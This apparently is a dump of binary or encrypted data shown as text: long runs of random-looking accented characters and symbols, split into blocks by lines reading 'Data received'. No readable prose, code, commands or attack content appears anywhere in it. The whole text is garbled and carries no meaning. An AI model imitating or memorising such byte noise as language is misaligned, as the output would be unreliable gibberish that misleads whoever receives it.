Yhé#>&WJÔ¯ä+®:Ò'6¹DhQÉD¤?]2)&!OV¢í6!j£òòó¼yZôóE¸7û¤Yß)>4\§ÎGãÄcê×B+z{f -ÌKìU.³ñÆE;¦JâCâç¥-SpðZÕ ÖstCDìyæî$ñÓiõË8ÍÌ®[Ð5£r/£iÞÀÐ>ò\ô.:ëkÃô¢ Bâë3åtB7)eN¿.AM:ÂÊ3 \TYÓ?çuo4]~B¶^^u¥¹ä®¨S åï¢>%0ª¶5ÒÜTÁè^!½ÈÆX;ÏáÉF!Ð%2ßWp²ìe+<ø)>~ÏÊ®7F`ßyfeúh\|Z .²OµYO[ò÷Z+Éæèéòù¹á;â>ixÇ;¹ÿ_üþ³ÁøÝ¡úÛZ~3èUoXÍ¥!cç2Ìr[/=l£O8¤² brRcÈ~ZMÔ&e»I·n¾µó÷¶2#ëÑ^ýÙ£Ákïã '%]e<fÈñ]Pñ\|ù/¯Èù96!ªBç
Data received	« AÒEäa97Â²>ÙhH©õlö´ Ì9'ei`R§m3Kªj¿Q ØàlÝÊHüÏÉ/^ýúyWB£©¾ARjß¤ikÞºÒrO%9 Å¢¨k¡adá[ìJqÂüê`¬}&ÙT4êÏ:néÙÌ5Z7´ OÅ'çÂZ±In:Ì)Ìâ³ vØÞíþÔÛwG·roøJ>ªsÆcVnçûH«Oc ÍvtK,¡÷«Ï¿µ'äëd´ØZI³ìDò`ètäèKVYÐ/ïYUþú¬.úUßR3ætÐÊzû\påiä¶0 «òþ³¼·l_ðÝGRmÂNä¥R@ýD8rEF1Hîþ=LeqnbÀá¢A¦«70èµ5·V6k+Àeuf÷1iþHê;!ÉÛ>äÕý8ÔP¢ÁtTÆ;ü×oPBKÖ9éBõ³þ©å'Î½Ïæ[¥»W\2¥þþÂôqÞÐÃDÑër`D"Ka?&Zôü@d6HÐôÔ´³çÖ<ÒgÚ·ôÊÛUà¤Nm55-ÝSñ<BðF^Ä:R¿âiæüã÷ÐÇ+ÜdÙ]TºÄèìÆ²ïcy6VýÌÚÑóË6´¤C$OÂ¿ùKÄª¤4.gb¸ü¦÷\|8ÓlÆ r[idl©áK !#?ÎØºý3WPÙzW.á{+äËgò;¶EÊ)õÑC¬ªTä¸åSJíáèy ªxïAçr©R[Ñ¸]]\|±?_zÃãÏÍfXß,Ýy¶PÞ= %bàwëÉóó¹¸8Ñ·_f¶@}ûWÑæLú.Bvçdp«¬h¤p>Qd[òyv¿[1~àQ-îvóUitk÷IH~Í.¡³=Û IeiGé"Á¬ß>Q_'¶òB'àeìWÏ»5 ª«sÛ¼MjZ±ÎZÁrAòARÇýê$$\|¸7\|Âèhw[C©õf]tÅÄGRVPÂµIz¹µ¦1j+úJÕq8\°¬æ¢kÏµ!¥:§áù5×a9ôfî©ùÂw¦-È^$iV÷àró!18ã¼ØAéßSBd>Þ¹ÂÕ:-ãh;¤TÎü¦®çÞÝ~M¡i ök>0B&²]Ù¶KUïA.Þn³¦hdeËW@e£M5(í(Ôïpã¡ÀÆ]Á[ñÿÃ4Z&ÕöK{Þ¯ñn¨¿ÌãÜëþ=ç¡l-#^ÓªÎRôáhåïO"lQA-üN¾UPJq4ÅÎÏdMG/"Snð×È O-g®óÞøîL&< .b©nãME£öShlï¢Ó ¦I0ueN$÷ï P^`_¾·ôd¦À1KAc¥ÉÐäôF6`¸î]Á øÃ³j¯Çßo{l½\:½úJêú\|¤óÆÅ2¯{îòí½HQ×Ò¡[÷NW6Ò[B¢1GqF+xøÔ8¶ S_G´zAÄñç®)4òD¬4ô¦.Èù¢GÖõ]·sMhw&îDþq³²)v·ò¨£]òÙoz;Õ#jÂÅIwÒa¬ùS®o³Ç9zÖ×ØfhwÆt(ì¡
Data received	OÅ;ÑJ²¥Ðz"s©Ý< w¢ ë~nrç«Õa^Í×ÅPÛ#Ûmà@ P?É»Ó?ªµX¾! cF{ÑõHø(Æ:ôÙE¼Óü5TÓ5r}¢ÞÑþÌíôõ:Tn9ÆßÇ{uG¶®òÚX§-Wí³ û9ßº¢¾v~oµáé@¤P`gÓÓj¹ªó5Kë:"}fGpßÑ#.l~]CàqÝ^!E¿%8º5Ò îõ·ùTÎ¸ë¤nC-~%>:Ä}ëÏÖ\³sâ×©òºJìÞZµÐMÁÏÛãï »R¡sKÖF5öuv¡0j$ö6Q§ ÃIN¨À{8eãT`PYtÛ.f¶jq@¾}´Ñ;+jÊtDËHntþJE^ßÑ¡ÅêÿÿaÅÀâaf¼Þv\|õHK}t´rÌCuôÆöhÁÂCf¥Ó'Îäþ2½ÁÇ@%NßÞîH("¼õsøÝ´Ì¦LJZÛØçÛyj±Æ´ìYÅ7aiùD¿`ì,¦ø÷ÃÝ#R©`Véaì¼7kO`aû'% 8>ð:òî¬²ö××Ñc´®Yÿ¢â¶èO×+-ö¡èØÈÚ¨T5sV¤>äÌÅ^Ò®t(L~gÏÑ(S ÿ9 y;Bþ/ýéµFÒ":( î'Õh=ûRªåAéTÄôµIo2 ¼ÞxC·B¨Ã8;C»êÄ %hpKõ3>iùV¥ÌÉfwpìÑø×óÄ¶òqs¶Mqf9ë«îôÉY íú'S«Î4ºzr E\ØJNs(æálíàYFÙ$Ú ¨Óêª»zèj%\¾®µ\w9ÅËÜùa3wÉ+o¯öí/íèuýb}wHÄÊ±H«d ü1?F¡m]»ÍíÓ»¯õn$Ù åQ³ôùmÛ1î6Ä0MòImÓ±Àà¹Or TÁwè¦D%à¯E¿ó.Ý <m½ÆêÎþë>Áe7Y%÷OÑ©¿dÈÓ1Åe·ðTÜZãøÁòanâNqÁ¥îÒ·À÷Ï^YÝñCß¥Üy´ìÂ{Ý×:O;R_YK{W®£\µmÆä¼ ¬k'MÎ-*x¨ÐÕ=NÈþ;AT_çÔIUíoLñòï)#øõØ"#u¿z¢&Ð$ÊOÎ;vÞVû?ZÀÀÛ·ê'RUsdÂ[\|áTº7é¨8t=R3Ä¥%Â·GSãt{ xÌÂ}×?ëI_þñJQmÖ¬»Áy®P±µÙ.Ð²Ån,Õ.Ù³ÛT^1R íPíïßMPeu©=¸_5ÝRØGg¾)«_=ÒÝ &&Ê¾´º6B¥{%y¬Å ·>½xèTGôÜíø(ÄþhÙØÆ8xe30¨ËæÃ6Zø·r{KÊ¡4îÑ)TÙÑ"0sä);ü{K iC%á'ú(ZÏ9V£.ýÕ@°ÚÁî·oHj%ßÑF ;NkØqoÁ k³åâfº¸/JètÎËD\ï@ËTàV0(O.È¥ïµÐ¬Û¨#Æ«øUµ¿"ÎÛÎòxKêÌ Ï©¬~z£ä0è-'ÿÈ«Ö¨$å±fjá2^/K©Hªç5Ç<×ÂF è
Data received	ÓËS?þe!MéSÇ;"ÐkÿÇ®¹î1ú®c]òXJxÄÄ))´u\f´!~cùûJa¡ìexAq\ã lUÝR£ýrÏlØbVoÝ4½À½>¡8ð²Zly®ï-øo+r!W£Ì¥¢I\|ádB¨¸æê»}ZØý?`³\EiÈýXüeñ>äÏÔæL1;¸(ÎrÄZúwqc:JVT/ÓíªÁGÿÆ8)ó5Z¯P ÑæÇÐ°DgTñ[¿íü@AyÝ¬ó^°eæiÏç^Ð_·¢¦êÙiµÉÀ¢fea+SÏº¬ê$!#c0ù¬F´¦Õ5fN=y\|¡ <D&%Ân¹=h½»Û+\ë±ÐnÆÄdogÈA¾³ð+Q!¿ð¡pÖ%@Jµ¥uz'$úHÛþAOýSîú¢@g.yûÙ Ò«oópT1ÑÄîóX2]l\|HlyÀ¼ç:WÕËü&K§ü´W¶8ØéNxöÏ þ%Î½Bí »µ¨XY:Qkæ¢<Ø@GñµS-ÆÚíåõOè¦/Ëé%qÆíÇ¸FÏ í°L±2£øIíV¨µâ6Ic¹¾Çàô<aD¢4ø¨Ã2w4æ÷ zLD åë^xÙX²½[ükkV,Ê2ü_ÆgSDWe£YÖM\|7ùÚB¸ò[Jªk; ·ÚfÃ¶b$ÿÈl«´mór<©®èG»)6,¢Õè¹6ë¼"BZ=ùo) 7ÉYÅy6äÈAhB¯@_cºVá¬£SÝü: j¸¥j}×©tØ'Akÿ¡/xvüÀzânÿü8ÞÚÞÑêKeòØÞÀÇ±drå+Oé÷È.®bL_±åÓNí¡;VºäÔç-s(mÖ>ðtK¸6t/Mö$^.)Neàù,&ò$0Ð6¼ÔLÏ{=£ªý±I¤ùwTªÕ mOÕ$wdjùìD°Ïð_¶r´pýsÓàbÄG?ç@ÉÏÈãRãt¬î1&.x¥/;ïRàÀ²CbO¡.°À&EDÖ½7E¤ÖÎºé÷Ë#®n®ø$ãqDyiùÒGßùFF4Yá-^)~§bìèÖM÷-@Pâe&z©P¡§<ï5¼õG÷V±ê{½Þ\|ÕÞ oNÐµjùoúñàÛtVë1¬Ib3t2®«¤ïVù¿I@Bô¢@\²/å2ûP qª÷Ã+®"¹í?²ÆÄÙ+1«_³©ÓpªNèÏfQôg¶jÑ3Æ #É5ÇhV¡a,§<bë%ÉØÚ©ü«'WìÆ¥ÐB0sêÔ(ù`YÞìÙû¼úçHM´²TÜSôHèµq qf×þ±Mè0Å>ßp1¡I;ë¨`B²®¦ä·¯ÛO»´kuAï°Ûl/>XÆÆL°qK°Y£©È_gyXeÆ¦õRÂ`":eJîO\² æç}3D,ÐùPi hÀ=ésæ47pÆõàjÇÄíñú©Lg%=g¶YR¥ÖÉ¨gÝcÁÞ4uDbTØ4IìñþM¤XsâO¡Hµ",ç_`niÀÉI%ÁÕæck»«ÑÐC9UV;ÜÜÁ(¾dÚÀ
Data received	-5(z%>~>,é21M1èÂ¾øRY õZÈXË·¢¾ôFi8r±Í¤Oh@·¾áØ¯6µmÅ@g¾Ì2ÖÁHl-#üÔìXMS+ÙLéLDg¶þ4XL+TM:óEóYQÏ¥äÈ[×÷ìF×à®5ÜFq#ÅÞWn¿9à¯}¨´ÞYI6%«QÝWÛfêx¡IyùëH´Ð®G-÷7`W¯´Iµ_óÔZ³kh©;ÌÜMµ:7(/Vý>CîDÎíê{É¤OÚÿ¢ØxÀxÃÑ?4ÁÌ@ÿØóÁ2ÔJc#ÎígØ7)ä ÜÙå!E&$ÃÉû{ÓOa+ £ÛJ^ÏA\|m 7ï(_Ûñ?~'A2Ë¦cXxkíT Ô±Kþ+îFY{Ý>KÕ)°uM/èRbþÖÄ6 ¬°[Û41ëQûAn2J9À¬PH_ôrÍÅdùWÒ;ëà9r>&«ÒøôÏïÂdÁî¤îµ ¥øUF\| UBú2üÚÃIu@]Hû«5+rì@e³GÿbW¿meNë@{]¾¸²Áír=PVÇø&Ü×®VK{óò+¾»Û#Z¨0~l¢YÛgô¼P½tk'1À¬aÃ$ËÝÛSàÜ-¨mÄI1dè0Ó@b\ÿ+nå»ÌÿÞ0~XIáúÐçGVD ÊY?Gü·]`{ÏÕk¼®Ml2kçGÈ°>ãÀúHiÙÍÄZÉ-¯lóÃNO6¦{ûÓàõoË<¶ìõ÷Wj~Õ;îëåEµM@ÛwÞõTE\|Z^a/Pö_ayYâË¢-1û]JùýÒw(mN~à»É¸1Æ§j/ifð3%ZØÖPZQ6<!äð/)ÇÈ×Sæ£åÎ5=ÖY7 ÊÎüÿ p,t¿L8\|É8z[Fæ, m¯éÛiXÍ=C¾çn #èµê O$])X½iºd(/=?â× )»Rh%9ENB¾Dbìt¹q9ëÕÊWXÌH:ìPkÃ½LR²ãøüÝ+ýqIw{TËv±`ö<Øü®á¥SýÛLt"ItqFM@Â¾ê×>nÐýÑ?Z¾û7Dl3øÚÕØÚhó~Dö$T\ÁÍ¸ÄÝvþ¹³{±¥áJB¹p5g{ð«B7\|#Ðg\|Ó+øöäâõÙ1r]¾úþûÝê~Î8eW$´m2{îÙ#] sVËB7³WMEàJþæxÕö_ ü£]P¡a¼- 1ýÛÍßû¦Ã·âVJ¦Cç?´yý'Ú¬÷8ÖØ+×ÐÈvi\BªÓËxûà¡Î/HF®F/A§9!X582ÍÚil8àòÆ[ø+þ`6"êÔ»ESqÂ>6ëtáþM»µµ !ßã%#-ñðt'kï½]:lXÕ0!"Íæol÷ f>Å4Ê;ì\|ùÕóUF¢ÞV°ÖQñ÷Ý¦&¯ÞÛ VÀÊpµè·boPkÜ'£(qøÚ68ïÆ2lt«\¬q~íÙKQiÚ¹¬!DéþàeX ýs`\MGÝK&n ÛòîÃ©]òÔÌ¤¿ÌDî~<ºs¹ó
Data received	-É·@ªP"D 5EAÁ±³VÏNR®ðÄ^9`d²gáyKa0DóÏGö7HnWU+e~WÂ¸Súê±hÅÐóÒ!³UÓ\¨Ô]Ü¦ó7³CP2?9WU8-p¥SµÅòþÛÑº- ååÃÂÅ#¯"æ_äîµü4=0súN§ dt¥¯N¦ªwÎJÑçáÇ7§}Õ³É~ñý3ñT õE÷ÁÏ¿ZRÂP!ÆÕÑÿÜÆ/-ì:(áq9¼ùª! _æÃ$fñoìï8,ò°7ï¥-,¶ÀN I¦Y$PQaðV4Ûù"Òa\ 3Ë0ÉÝëÈv¤àäËÆø-$çÎÏqJ\|¤r Fæ?36Úøv~ÃóFÏ½P.¥×ñeÀwm#cV©ILþxi )j¦î!XèRVCêgf+2_§¤ÊOtV¾7rWaºd8Ãk8cÍ5¨ç&ð$s&ø')²;×c@´DçepåÈÁ9QC^ôMëès©KÌ79ïàÉl°¢ºVÙÆì¤bJ';D£¬¢¾;hYè?'S°ìøÙMMµmaÝÜÂ¡EÜKÓtÈÑÁ$ªEþ@>$½·ÙhÌ&zVVÁÓ)øÚÀIFäÕ¬A"Ee\E=õð®Rwm(F³XZ½9Zl¯ÆZ ý)#C\Tá>oþ2÷8°³¬í@R'%æC÷ÜZÞ]ÞF¤CÌ°!um®PÛx³]å[Ú¬ª~=Â])@ê°g¬`OIÁ Ò1)Dñt¢ØªîEh¥Ô5k¶¯.w@ÁïSï<8pàmÃá?[Þ íF´â×ÔuN+õÜ¨"ä'î¥Ùb,¯ÓÐïOã>!ò'ÃDg)×#£^9¬ÉdÝÑÃ-R`¬ÖKÈP¦\|Ó®'÷ê¢Öd}Z¯d äOÐb¡$VÜ(W]kÚÿSo=tâ»ÌäéUÚö)ð TX>áÝÍsc0w>+ zNü¬Èß{JëÛEïáI%ìIÆ¥òÈ"[÷¶&dh`t6NlØhW°¢ì/8EXVßù-láÕèÆW·å:3?ªÑmf 4],Þ¬P»ÕU$u²q·íÒÁüÛÿýh¼Ô.HúI$WJ>4ç4Æ wScR¸¶¼~×iZê¦h[Þ÷þÞ3¿ÛÕªMxk=,Ë[»xpÅ¯¶8IQ×÷¨H¶Wøò]åÛÅgIÛ'À¹³u¹\[Òçÿp¦S¦baäIúôü»¶èB¦·ã9ô!ëýi9¢Sç>ÿÅ©Ë±÷ïä Îê¾ñé2vìiÿòl¥©_y5v±Òç: wE+¨ÖäX ;VKÑÎÏNßÉ#pÑ799ÉGøåÐás ?÷¤ÓG\|ö@®Ó®£g¦kJ^ 1òý\Ós.ÃM·Y÷ÛªÆ¸:Ìð£ 0°aö}ï7·A4¦y"î'nÆUkJÜ²á7ÓËã;ÎaVóòYªki©çÏÄÑ"¸¡^¯9þÁ¦dÛyÿ\|èf YôVQDlëÜÍ÷ÏüLFÞTFhÍ-÷ÖÎXàMC.À÷#`Æ¬æOBWbóÃ I
Data received	Ýø£óÓ4Ù¸$îâ{ÁìLv0óÞpäò«ÜAø¤¿ÚT;?Ï`à-ÌäOn¬û¶wÈÎç>K Èq ÀYñr #T L¦¼¯5n,gø§uQY Ù§S¯³wîÛUûËþÐÁ'"Ô£àpXY··yópõ9hääxy<x ¿0ê²·õÿAV£ZÉÈÆùªbD¾Øn%;Bå¿) bØ7sÕ:¾ÌgÃ¥Ô¬é;5k?ó]øÆ]^×¼7æ Ø]º$»Äùb÷§.¤Â/ú> sªò 6AvÔÅÆáöØß1Ñ·Hf¹ûmH²~-ÞåS÷¤Íº.ÅøWWNãÐH;!ø[+ßC9ÇùàÚ ºÛm@ÌµòC6aßò£¬rW®äÜqH!F k²ÝW°eD^õ¨£ëEI"îÊL:ìõªAå ~pÕ´D¾¦/î§?áÍËúc¥29Ý^:äâÐA¯asÅ/Hpb¸\AN 4pQhÏõú:í î8=zs~Üñ}_2z¸ìúdQI-3xp¤bË='j+F^IÚÕ5(~.Z ¬õGihÆiäm§æ^VðôsN©¼û.ÞDØç?.9dK©P6l>ÕÜÔRÿj´°¤¸üÕá8]U÷ò!úÈX÷bQPàBú$&^¶VÖºÞY÷-S²´^Ì ç§~zÄ¯bà÷ò»¦ï¶sëC%Ò;hÐ½ÔöI>+lÎ{²Ã}m÷tÄÄÅMò ÒÒ¤n9`÷Ù/Ú¿÷õÚevl°ç5t5(`,ËcoTî.QÇfóo~´ñiÆ[d;;nEQA(hX¡ªnYxÂfvéDX\k 7ºtAUë£¥òOZYz01²LïiçÛ©Ú^NzÎ8Ï¹§êÜÊUÒë«9ÀB0F¹VÂ(ß¿ Û¦î!m<\|»Ìg@rf¬Uu2ª±Ûq½ÊARhpáÙýÚ#Je®?X}õw',on÷ÍÐyÌÑ×n¾u°06/·;¡o`¢ .Cº¹Ú·6ªÇ0üNOµîéï¥µÉ¼ui-¦X8\|f8DBAÞðè(óöçÍ&·ºa'J=ã5BÉaËZB+\£VÃíNã-É¹Ö½zl<´¢®ÌÁh¡úRÀ>Ù§H}í8ã²=Ät'ÝÔÏÙg°Þëk!Ãþ¶äÚP}y Ó:þUÇ§}áEÎÞÍYÊzq60N}Ð8-Ý¨Ú1Åð<^TÔ/üáó»7ryqÄ¦á§>}®ûeÅ«Cr6¸>$9æ7¡{óéZÏÏ3ÝÙÇäC5«i¬ÊR/;´}9üÎS ØÃÀ·Úuà\|ÿQd"³âk¶zÔ-zCL¤ÜZ) f3 S°PUûâVmS¢àÜ.FÎMí¥í:ûÎ`z¯A!!l\cº`"_®Æì¾´i»Â°¯C!Z[º'éª9×ÏC)äÓÕ3Q,O0U&0 5fO¢ip>Óÿ¡¤îkÑ·½î?5Ù¿SÞìñcæ)u¦ãæ^Î í´ÆÑT4r;a ÷åÊ¥ ÖèµXTöoõÕpe%p³âÿ=Ü
Data received	àH²ªS§Nêj½I7'6µ¥fO«ö°mH¡F/K,ÒtëÕ¢bòf´K¦ÝD\|×];ðù)×/Ô¾1åãMÇó7T÷b+(ioc®ÉdüënsÄµ3=ÄtxÅÓ¹{¯êëwÓ]ºê¬Ô1ËØÂ Ì!`ßÃh¤â¢× H6üµºª³ººØHáC£À±HMwvâ@ë4ùdÐ¹ç¬YI«A²ÉS#eµeÄàYåü8³q?"a«<4ñU§Ü®¯?¢ÀðÓMåé£lW`¼¦¨CÃÜPH5cæ#m2ÚÊD¦öyn7ìØ®äUÇkLÏ¹t<G®Y ÍOÍ;²Ò¶JzÍ[¸skàk~JÁçÞiÊ»è÷ø>Q28Óðçîf&Þ<ª:+mþC+¥Ù!{4óîÿBûÞÉnÊ`$ú"7§}£L¼ç\8!Dårud¬,×Oä¨égrYÐ\æ4óÅÀëÓëµz¹¸ë^«ßsíiÀ#mukøO!´éèJòâÅ´^}ú'+rÇôþ8ßïÎüt¥Ä^Àå]Úäé8@dv{²~"uÃF×#æY@äß½ÆhG 7éÔÍ>zë¼¯úù£bDs3Pd9òÌK/áßE¯¤Kô-G¡éIúËÁJ¤]¢é`.§k½Ë×g"òW¥RpQº@\E±¨m#$Lþ".!4©2qHÿ#WñÊsVºò fjH^eÁ>±kõ¨Þ02ßW_¾XÝ7ÄgÚ«Êaóm/=kâ.Ñå8ÁA-$oaXD¸¤ÖRXÑØCJÀ3"õærüÿ¢±LPöîÏâh»üôÛug/X ñ+%ôêØl]ÀxÝ ïí½ùäMÎÌ¹Ò.wçw±cßÙà0ò³ôR»®!)r¹BbªtïGä êtÇ>ÑRO xðÛ+ß©_ÊYTÛ9ëýÂ &f±ÁAûó Qßòîfgas.PR qÃe¥05égå8Owí^ù:{¸ãr ¿±ºîb îiQÖ§]À2ÙcvwÝbObjÉý¿¦1ÊâVlàÔ¸pÒð >µ´LY)É®o\äÑkw~Û¨\E¢)i÷wakúñÛMàðgzrüvtlÑ2ÈÉåcQ' áõI~sãËÀê]ùSÏï[Ä{ý¬ü.¬ÎÉ&þ±Ü9ä4Ü:øé£@Ût&ç¼æÞîÅWïá¾ÅF0ÚîSá®µÛ§:³4é èØ6ÊlMÇeÙ¡¢òº\òñúcî2¬díHvÎ¨\5 `Yóã´=ÿÃ·Õúp6çq;¤GÝ 5qÑÔuNqº5¨oÄðZ±@>-Ä$ÌEH±£À¡!ä5BD+,Å´öïó½WÓðý§+Ù{}:@þfSiGèôà-Ï"6¶ñP°òÀjÈÌßB'c;ÖlJ®¶q:-ÛÜ=´÷{«m½ÐW 2³ú+¥hàÞ&W<¬çx9ßÝì\=P"q@¶TÔ@@±»dE[ Þ]Â¬÷ø>qOmW«ÇÜ2^.¶@ÄjTºj¤È¢j©ÌPÀXÀ®áÝ¡.#òv¼NmÕ´
Data received	i®4³ÓÒ2!?Wt ácðêZ÷ÒpêG u)w\|`ð+Wáüo5ô>éÞ¢(8ÇJ~(¢>¡j¥4Öµ6¯3f´©ewi'\|Ý¶$åÙadÁL!¿«×åvGjè¸÷ÕZººtC\|,ª(ÒþÆT80$òÙ9v?´ÞT6\\| ©º{vjZ2tó'ivÆ©Ý«uüè¦ãÎR-jä2µE/¾_«EìÚið×X¦+X$P<Y¥Ûy¨pzßk]£ïÐòØ¯ñÂ4,~&øFPcxOv½íZþ?iLk8â©Oü×xg1H8QaC;þ+YþZSrëê9ëüÐK+Á9µ³vÿ-êOÑìÞ ðÜ3ÂW£¶s¸ÐAÇùm<#X×¿ó"ÏæOEê»ØZV)Ã.a©Í@MªÅ¢ëDw\|GEÅ=3¿R0ÆE] Þ #é¾P¡B8lMy<9XÉ¸V8Ánkâa£uIqäÄÃ¬ð`5&Êeã:Bxæç´¼6}ß7-]ù9¼ø¡ÞF) ËI¾ÒâØÞì'{)¶åÐþFÅù¨¤!¢ÑÓgIj%_ÚÆKHY?f<>UÚìwÖ-s¢Û¤Àµv(«3Ñ÷=níOÓAÄÎ¯l²Ï·]IÍ[Üàï6æ\5Rú¿8ÚPÑkr±ÎjHÍÊøÉËHÎ`/%V)ÚGkÑåî$è¤["pÿÏÑ`Æç·©ðgÀÌ_³tì¶#ÕîgÕþëY#`~U1íBi`þ³\|ÜõáZéÝô¿vv® §L<õ¤ü¢OtyÙ¿Ð]ÅÓþ{Ï#÷>lGí½GËüì¸®xw°¡½ë.º!N9u;¿J®¸FNTÿE¶lí¥tÊh9\|e>\|üí;¯%öT0®çqî¢sÊd¤ªk{x ;ðåo6ßQÆüÅ2/ôE§^ïjRÁ8U£!Óîòrh]ú4\|¬ø$QræÚE]ìS¥¿à¼¡å¯å.üæE)É2Ø,W}zv¨Ã)JëýJvÕûwâÞñJÌMÔEZ%¯êÚ 75µµ5á3"\|Û´âPA©öµõXW´áÄ±1Ï)Öy?ãæ3q¾ÿD6]d²xUÃÈQÍúe=Û´½üã'<¶±fö³ÁS¡N<ýã^_u¼¥sÕÙqá þh&3°Ã;µw¶X'ÇwÂ¬2UO{ïjê43>ÇªpÔ½"+ZR{½J§´ñ&æ7@±Áï4#¿éä«`ÄÞßöø¶%5YVõï´ÍCFß»=^ñ&Ú `;NãÜ÷ù·£]¾¢H£?l RØ!rÏ3zFPï¡ghBãérhû=µõøÝ°°øg89ã×Á®C%"ýà)¸ñ¼# ±ÜñàEØ:±¥Øax~(þqôÔµ°1¨3ÝÒ°Àn_aÖ³Ï8Òw¸=ßäÀ_<âÉÃ§ëÃHÙO2m1YYì5¹kçGhh¨LAu\|ç#æzºîÅ÷¥ói`Ï¼Üè¬:3ÀÛZ[7õâ®xlä±Iµø½ãýOð½¸9RÙl.å;÷Nú}¬y
Data received	DÁ®¬LA}±KlðW;Í¥jaÕhÈaTa\?UµØZÈ{¢ò ¤±7<§äø) ^=qüäBÌ@YHö ¯¾j7c¢F½»É¬zÝýr[ïp¢OTæ¬3ä²Að¨ç7Ú_Ð¦deQü¤Þ U_l²Î<L¾¯Î hpSCQî)ÁDLÒPÎcþn~£¡æ* ÀÜ68å8x¾Ïöª)Í`åû#}ý/¸É#×§[lGJðXxõ0¸(c/7äPôñÒa;ñwKÁH_äçðç´^Î!7Uv@¸3_P úUâ»_·½,â\ _ÖR#©n'åvûqOC@¥'hêiÅêÑ!«ävh ¦ÈÁd00¼IlkUÓÐ¾#i(üÜZ½¡K¾·8{áW¡)ÊÛýgëy#@Y0°cV5.1Äðãv^" Ôd¹LG\|aúú7Í´'VJRA¨Ïk¤Z÷¥³ÕâÙàuEÓ]_ ^]³Ð²ó?êùÊ8½Uánªu§Ü4Àí(c>²m\Ìj@Zö\AAl_Á±¢î:¼iVDäN4k¾D_<ñhÚijÑÕvÓÍ¾¡m°¬Êû@>`;ï %j)ËV¬)8NHöÆ7e"n/Yá2®ÞÜ¹&bÇUÇPÔ8¹aÒ çÄÍÈå(7iBÍ0$^ lQ&a+Q?Ïf7Y¨[I0IèóîÔ pÂÖETÇû¢¼Ðvcqû/8PV_ÐéõÀñÃ· ·\|æÇ AR÷ "_E©BèF÷æWXÕkðÂÉdÎÇ5ò×µSôàX î`Dq¡É`XÆnoñ=´·Rr<+xIW:ë:7¥¤qk~nU-aøð%_cpÏaTsF'ç²ÑfÑ%+ÀÓ@ÞÛ¸ò8EZ:Ò2ÓÅi«M-«âx½{ÿ¼4$§mRåx¬§jT-:\|Äýe7%²©SR Ä®hcÌ¢;3u¦?BïQÊàZ~D)\|&6OpU4q0iÒáÄÔ,¢?Í¨IÎáÆfE©~3)Yu1Õ°EèSSiéhq\H«Sü»¤ÂÄö¨1ûýÒÚëå!åØeÇ¥/?×9ÚbØ-RM»©°44·ÿý¬>Âö%í¥% ã³/»M\n`$K^ñcO£¤º=O6áú¦QN=¢mÉèX,ºnÙ®¾ÉÝÐéðJGäÎ±»`E? ô.ÈUûªÐ½ .Ö%+kÁÖÑùñºEpYªË?¶ oþkÄæg?»Ú /¡ÜÃXñU´Å\| Ú\|¸wb ç®a#hÏúÕD;;MuóLÛJÜhÏà!¨ ¬÷õê_D×x<ÒÎc CÇ÷8é}/º\|zå$d%£Ö$Br¥Õ7:ô''UA Z×´+<lNB-þxÎ¼¿¨=µòÀÙõ7O82ª ®6ý7ëjÙi5< iHÉ¶ÄÐ Ò¥5£óõ¦»:Âÿ¹´í«(4/÷ÑÒ_AXN\cA#&ð'©Ì)~¸%£¬'3¶A·8BÆ?{CUöÂÞRtn!à/ß1&ÂcÞvËQ=){²µ¸Z7UQõM3iH
Data received	ÄÐ/ÿ+¿þKsEùZR$IA\ldeòéQ¬î®¾mý^Ø¨¿±NKêlbB¨b×í¬Ímø ÂÀ¤+"LSå»Ð.(nDBõp £·\|¢ 4èðd\±7ëÉK>YÈIlk\|Láøò¨µÐ&«À×lÃ97ô°%h¨7ÿu>Çµmec4Ã2{góK ããý¸[¶Ô~ vZæ8ØYuÒéÌÜúÕß=½4Oá/âÔK êÕsÚh-Ê}nyë½±'j¯â(ÝÊz±ðZµ7>{<ÿ8ÌeöölìêáÙi+õØhæO@£Î7R@V¥cjq·úÎ¬ÚïVÍ[ÏÜW(½n±¦êyb¾\|òrÎQüEh\|®ùd%ÈÚfu®^«ò®c#0êUâC7¨<÷Ç§é3±L¨ÙêúD ü8@ô a²ËÏ:Ã¾´ºúIÎï)jÒàóºKõYu§!¡ödå±`t/SüèùÂåv¢-ÁIsk è½¡^>þ}@Vé³ßMìDÓbàÂLÕð">)$6ÇèÖóg vöSgdìÞ"g¡áéª(´ lÍä/kmP¶)ÁHØõýÕùüó§Á¶06/i;¨ÙþKà8í% UÑTøå+E¶µ¶Ëûñ¬¸ÊÈ\½1rÕz ò§0¡Zo®2Va¥Ë±<0r¨þõtÕZHêý}_yèIÇfº\|øW8®å$÷¨ëøy¤ ½Oõãâ-Ø}!,ÚòÉ¶$Ì×ÁoôîÔqÙ6s~y®',Æ8ôùöÉ<V`e"QF1-`ÚÊUÞl²¯`PZ¼ô¾ÃÙãRh3¼qì/Óó`lLÔ=ªÁFfÏ¿zïºÙÓ\|}-Ó,ý@øÕï v¤õD2¿ ÜcÂõª~éÝrPo¶ÎM±h îÎØPpHÔ¡l{ÿo®B3$ÐËÇÅÆ}WÛú7ÅËsrê9)u5éÆ×K(>>Ññ®ªÕãáÝÝ¬Ø3X¤íT¾ÂÏÞ¯FÅ¼ñ9B=î¤ÈÛ¨fÍÈ-}°¦¥©fTãødRÜþòõ² ÑiPFD øïõ>GúÄå']f<kÄ(ÄtAc:ÝÙüØEB -]ÜEwCeÊ9Ë ÛBjW-7éfAUËhä!ªÔ.:×<VAy>òHb>ßß^}Äzã0nà¿òjJ\-ëÌÌeeg$×ôºV-Øðî}í 6OºQòeRªQN;9B¸®ÞgUý¯¡µÂú§)Æo=æ§³^¥¤.`éÀó XPÊ×äÜzðúàôQiPèÐímÄ`ëà Ø;I¨Ìó®eL±Â2²öúVõRùeæk:qCüï'ËoÜehÔ¼DjËÏ}¢PüG.Üh(=o¡F/~³¥N÷s,P¿!i93zðuY^D=é:Êþi° Çù"w/ÛÈèH¶êÒUJõÞ/Hâ²gÅ?ªh¥'À=yB\á®Êín¹iµw %¥ÚØ£i²\Û.a¸a ß¨]ÙþÇEm*'4hhÜl$ÔÐ~P&Dd¢A¢ùáê´gØ÷»§33Vj
